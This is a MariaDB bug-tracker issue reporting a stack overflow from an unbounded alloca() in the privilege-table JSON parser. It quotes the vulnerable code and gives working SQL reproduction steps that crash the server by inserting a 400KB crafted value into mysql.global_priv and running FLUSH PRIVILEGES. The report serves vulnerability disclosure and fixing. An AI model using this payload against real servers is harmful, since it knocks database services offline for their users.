Uploaded image for project: 'MariaDB Server'
  1. MariaDB Server
  2. MDEV-39266

Stack Overflow via alloca() in Privilege Table JSON Parser

    XMLWordPrintable

Details

    • Can result in hang or crash

    Description

      Summary

      A stack buffer overflow in sql/sql_acl.cc allows a privileged user to crash the MariaDB server by inserting a crafted large JSON value into the mysql.global_priv table and triggering FLUSH PRIVILEGES.

      Affected Versions

      • MariaDB 11.8.6 (confirmed)
      • MariaDB 11.4.10 (same code, confirmed by source)
      • All versions using `mysql.global_priv` JSON format (10.4+)

      Root Cause

      File: sql/sql_acl.cc, line 1772 (in class User_table_json):

      const char *get_str_value(MEM_ROOT *root, const char *key) const
      		 
      {
      		 
          size_t value_len;
      		 
          const char *value_start;
      		 
          if (get_value(key, JSV_STRING, &value_start, &value_len))
      		 
            return "";
      		 
          char *ptr= (char*)alloca(value_len);  // <-- STACK ALLOCATION, NO SIZE LIMIT
      		 
          if (!ptr)                              // <-- DEAD CODE: alloca() never returns NULL
      		 
            return NULL;
      		 
          // ...
      		 
      }

      value_len is derived from json_get_object_key() on the Priv column of mysql.global_priv (LONGTEXT type, up to 4GB). The alloca() call performs a stack allocation with no upper bound check. When value_len exceeds the thread stack size (default: 299008 bytes), the stack overflows, corrupting adjacent stack frames and crashing the server.

      The if (!ptr) return NULL check on line 1773 is dead code — alloca() never returns NULL; it either succeeds or overwrites the stack.

      Reproduction Steps

      -- Prerequisite: root/SUPER access to the MariaDB server
      		 
       
      -- Step 1: Insert crafted payload (400KB authentication_string)
      		 
      INSERT INTO mysql.global_priv (Host, User, Priv) VALUES 
      ('localhost', 'alloca_test', CONCAT(
      		 
        '{"access":0,"plugin":"mysql_native_password","authentication_string":"',
      		 
        REPEAT('X', 400000),
      		 
        '","password_last_changed":0}'));
      		 
       
      -- Step 2: Trigger FLUSH PRIVILEGES
      		 
      -- This calls get_str_value("authentication_string") → alloca(400000)
      		 
      -- Default thread_stack = 299008 bytes → STACK OVERFLOW → SERVER CRASH
      		 
      FLUSH PRIVILEGES;
      		 
      -- ERROR 2026 (HY000): TLS/SSL error: unexpected eof while reading
      		 
      -- (Server process terminated)

      Attachments

        Activity

          People

            serg Sergei Golubchik
            Weiheng Weiheng Qiu
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved:

              Git Integration

                Error rendering 'com.xiplink.jira.git.jira_git_plugin:git-issue-webpanel'. Please contact your Jira administrators.